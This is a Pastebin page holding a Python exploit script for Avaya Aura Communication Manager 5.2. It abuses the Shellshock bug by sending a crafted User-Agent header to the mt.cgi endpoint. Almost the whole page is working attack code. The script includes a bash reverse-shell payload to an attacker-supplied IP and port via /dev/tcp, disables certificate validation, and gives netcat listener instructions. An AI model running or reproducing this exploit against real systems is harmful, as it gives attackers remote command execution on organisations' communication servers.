Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
- # Exploit Author: Sarang Tumne a.k.a SarT
- # Date: 2020-02-14
- # Confirmed on release 5.2
- # Vendor: https://www.avaya.com/en/
- # Avaya's advisory:
- # https://downloads.avaya.com/css/P8/documents/100183151
- # Exploit generates a reverse shell to a nc listener (Shellshock Exploit)
- ###############################################
- #!/usr/bin/python
- import sys
- import requests
- if len(sys.argv) < 4:
- print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
- print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>"
- print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
- print "[*] Netcat Listener: nc -lvvnp <port>"
- print "\n"
- sys.exit()
- #Disables request warning for cert validation ignore.
- requests.packages.urllib3.disable_warnings()
- CM = sys.argv[1]
- url = "https://" + CM + "/mt/mt.cgi"
- attacker_ip = sys.argv[2]
- rev_port = sys.argv[3]
- http_headers = {
- "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
- }
- def main():
- if len(sys.argv) == 4:
- print "[+] Success, spawning a shell on your custom port :)..."
- requests.get(url, headers=http_headers, verify=False, timeout=5)
- else:
- print "[-] Something went wrong, quitting..."
- sys.exit()
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
